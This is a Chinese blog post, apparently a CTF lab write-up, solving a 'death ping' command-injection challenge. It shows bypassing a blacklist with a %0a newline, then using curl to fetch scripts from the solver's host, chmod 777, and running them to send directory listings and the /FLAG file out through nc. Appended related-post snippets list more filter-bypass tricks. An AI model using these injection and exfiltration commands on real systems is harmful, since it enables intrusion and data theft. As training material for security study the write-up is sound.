从0到1:CTFer的成长之路死亡ping命令

最新推荐文章于 2024-06-06 16:58:38 发布
最新推荐文章于 2024-06-06 16:58:38 发布
阅读量177 收藏
点赞数
分类专栏: 靶场 渗透 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_70137901/article/details/134061881
版权

从0到1:CTFer的成长之路死亡ping命令

题目要求:路由器管理台经常存在的网络ping测试,开发者常常会禁用大量的恶意字符串,试试看如何绕过呢?
启动靶场访问目标IP
在这里插入图片描述
尝试使用ping命令
在这里插入图片描述
看到执行成功尝试使用管道符拼接命令
在这里插入图片描述
用burpsuite的重放模块进行测试
显示包含恶意字符接下来使用了好多种符号都恶意包含直到回车
空格也是可以执行但是ping不成功
也可以用url编码代替%0a
在这里插入图片描述
因为该docker未安装bash、python、php是无法进行反弹就用尝试用nc来返回系统回显
现在kali里写一个sh脚本,脚本可以执行界面回弹,再启用http服务传入该靶机中赋权执行
写sh脚本ls / | nc 10.9.47.103 10020将文件保存为backview.sh
这条命令的意思是
ls / 查看根下有什么文件
|管道符是并且执行nc一个反弹回显
在这里插入图片描述
开启http服务python3 -m http.server 80

在这里插入图片描述
在burpsuite中修改请求文件进行传入要用crul命令将文件传到/tmp目录下切记wget命令虽然能传入但是文件执行没有效果 curl 10.9.47.103/backview.sh >/tmp/backview.ch
在这里插入图片描述

在这里插入图片描述
下载成功后我们在brup里对该文件进行赋权chmod 777 /tmp/backview.sh
在这里插入图片描述
我们在kali开启nc监听nc -lvvp 10020
在这里插入图片描述
在burpsuite执行该文件sh /tmp/backview.sh
在这里插入图片描述
返回kali可以看到反弹结果
在这里插入图片描述
我们看到一个FLAG文件再写入一个脚本文件查看一些这个文件夹
cat /FLAG | nc 10.9.47.103 10020
在这里插入图片描述

写好脚本之后再次开启nc反弹
在这里插入图片描述
在burpsuite中向目标机传入刚写好的脚本再次传到tmp目录下curl 10.9.47.103/lookflag.sh>/tmp/lookflag.sh
在这里插入图片描述
对文件进行赋权chmod 777 /tmp/lookflag.sh
在这里插入图片描述
执行这个文件sh /tmp/lookflag.sh
在这里插入图片描述
返回nc可以在回显看到flag已经出来了
在这里插入图片描述

抠脚大汉在网络
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全 | CTF】攻防世界 command_execution 解题详析
等风来
05-21 5978
ping 命令是一个常用的网络命令,用于测试两台计算机之间网络连接的连通性。通过向目标计算机发送 ICMP 协议的数据包,并等待目标计算机返回响应数据包来测试网络的可达性,同时也可以测试网络的延迟和丢包率等信息。本地回环地址是网络通信中的特殊地址,指向本机的网络接口,因此通过发送 icmp 数据包到该地址来测试网络连通性和延迟。如果 ping 命令不正确地处理其输入参数,就可能存在被攻击者利用来运行危险的命令的风险。2.ping+IP地址或主机域名+命令参数。3.ping+命令参数+IP地址或主机域名。
BUUCTF--[第二章 web进阶]死亡ping命令
qq_45414878的博客
11-13 7028
BUUCTF–[第二章 web进阶]死亡ping命令 开启环境发现是一个ping的页面,并且过滤了许多字符 fuzz测试如下
BUUCTF---死亡Ping详解
qq_49422880的博客
05-25 3314
BUUCTF-GXYCTF2019 ping ping ping前言知识点总结关于通配符总结 前言  &esmp;昨晚半夜在一个大佬的博客里看到了个名叫BUUCTF的一个刷题的地方,心想大佬都在上面玩,我这波怎么不得在上面留下自己的痕迹,第二天就直接上手,也就遇到了ping 这题,这不简单直接连刷两题,因为之前也接触过关于ping的题,然而就在GXYCTF2019上的一篇WP上,刷新了我对绕过的认识,于是乎写下本博客记录所学知识点。 知识点总结 先上题目为敬: 疯狂暗示!!!首先我们这里先随便测
CTF演练---ping
最新发布
2301_78637299的博客
06-06 422
CTF演练---ping--->只需要输入ip,就可以获取到你想要的
从0到1:CTFer成长之路——死亡 Ping 命令
weixin_51559599的博客
10-26 308
手动尝试慢脚本生成可打印字符,后面拼接命令bp 爆破出现中文乱码设置编码爆破最终发现转义后的%0A拼接时未被过滤。
ctf-ping命令执行
qq_45414878的博客
11-08 9456
[GXYCTF2019]Ping Ping Ping 现在做一下关于常见的绕过ping执行其他命令的姿势,启动环境,连接并输入参数,查看当前目录下都有什么 ls命令没有被过滤,并且知道flag就在这个目录下面,用cat查看的flag的时候发现空格被禁用,绕过空格常用的方法有 {cat,flag.php} cat${IFS}flag.php cat$IFS$9flag.php cat<flag.php cat<>flag.php kg=$'\x20flag.php'&&c
CTFer成长之路命令执行漏洞
自强不息
02-23 509
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
计算机网络讲解实验二:Ping命令.pptx
11-13
Ping 命令可以检查本机到目标主机之间的网络连接性,包括确认本机 TCP/IP 协议运作正常、确认本机网络设备运作正常、确认端到端的通信(三层以下)正常等。 三、Ping 命令的参数详解 Ping 命令有多个参数可供选择...
Ping命令实现的扩充
09-27
实验内容:Ping命令实现的扩充,在给定的Ping程序的基础上做如下功能扩充: ? -h 显示帮助信息 ? -b 允许ping一个广播地址,只用于IPv4 ? -t 设置ttl值,只用于IPv4 ? -q 安静模式。不显示每个收到的包的分析结果,...
网络管理常用命令之一 Ping 命令详解(图文)
10-01
在网络维护过程中,Ping命令是一个经常使用的DOS命令,它是用来检查网络是否畅通或者网络连接速度的命令。可用于诊断连接性、可访问性和名称解析,可以探测对方计算机的活动情况,还可以通过数据返回时间简单推测...
Windows环境后台运行ping命令输出带日期时间日志到文件中
08-25
在本文中,我们将深入探讨如何在Windows环境下后台运行`ping`命令,并将其输出结果带有日期和时间戳地记录到文件中,这对于持续的网络性能监控非常有用。 首先,`ping`命令的基本用法是在命令提示符中输入`ping ...
C语言:Winsock网络编程—ping命令的简单实现 示例demo
11-24
本文将深入探讨如何使用C语言结合Winsock库来实现一个简单的"ping"命令,这个过程涉及到Winsock编程、ICMP(Internet Control Message Protocol)报文、IP报文以及socket接口的使用。 首先,让我们理解"ping"命令的...
ctfping命令执行绕过
m0_75178803的博客
10-10 892
相关wp参考在用linux命令时候,我们可以一行执行多条命令或者有条件的执行下一条命令方式:command1;command2用;号隔开每个命令, 每个命令按照从左到右的顺序,顺序执行, 彼此之间不关心是否失败,所有命令都会执行。方式:command1 | commandLinux所提供的管道符“|”将两个命令隔开,管道符左边命令的输出就会作为管道符右边命令的输入。连续使用管道意味着第一个命令的输出会作为第二个命令的输入,第二个命令的输出又会作为第三个命令的输入,依此类推。总之就是,
CTFping命令绕过及符号用法
Hardworking666的博客
10-13 9816
文章目录一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ig..
经典ctf ping题目详解 青少年CTF-WEB-PingMe02
m0_73734159的博客
11-18 1369
如果想效率更更高,我们还可以自己生成Linux常见列出目录文件和查看文件等命令和常用字符以及关键字的字典,并使用BurpSuite进行爆破查看那个命令和字符以及关键字的过滤情况。'作为命令之间的连接符,当上一个命令完成后,继续执行下一个命令。当然Linux系统查看文件内容的命令还有很多,这里就举着三个例子了。因为f开头的文件只有flag这一个文件,所以查的就是flag。cat是Linux系统里面最常见的查看文件内容的命令。ls是Linux系统里面的列出目录文件的命令。查看根目录下flag文件的内容。
CTF入门笔记之ping
qq_37410729的博客
11-02 4113
1.用命令行找flag文件 随便ping,然后跟ls 例如:1;ls 发现index.php文件 1;cat index.php 查看发现就是源网站。 那就向上找 1;ls …/ 继续向上找 直到1;ls …/…/…/ 发现flag 打开 1;cat …/…/…/flag 得到flag 2.绕过过滤打开文件 同样,先查看目录 payload:?ip=1;ls 发现两个文件,尝试直接打开index文件(虽然知道肯定不行) payload:?ip=1;cat index.php 果然不行
[实验室每日一题][20201123][Web]死亡ping命令
m0_50317371的博客
12-02 3715
原题目:BUUCTF–[第二章 web进阶]死亡ping命令 前置基础(本题会用到的相关命令) liunx命令 ls命令 Linux ls(英文全拼:list files):命令用于显示指定工作目录下之内容(列出目前工作目录所含之文件及子目录)。 转自:菜鸟教程 cat命令 cat(英文全拼:concatenate):命令用于连接文件并打印到标准输出设备上。 转自:菜鸟教程 curl命令 curl(英文全拼:CommandLine Uniform Resource Locator):curl 是常用的命令
BUU N1BOOK [第二章 web进阶]死亡ping命令
SwBack的博客
09-02 2213
存在以下黑名单过滤 ["$", "{", "}", "`", ";", "&", "|", "(", ")", "\"","'", "~", "!", "@", "#", "%", "^", "*", "[", "]", "\\", ":", "-", "_"]; 但是发现%0a可以执行命令 准备工作 一台具备公网IP的服务器 我这里采用的是自己的服务器,没有服务器的可以注册个小号,在BUU平台开启如下环境 首先在公网服务器上面写入shell文件 内容如下 a=`cat /FLAG` c.
《从0到1:CTFer成长之路》书籍配套题目-[第二章 web进阶]死亡ping命令
weixin_46703850的博客
02-26 3317
《从0到1:CTFer成长之路》书籍配套题目-[第二章 web进阶]死亡ping命令

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值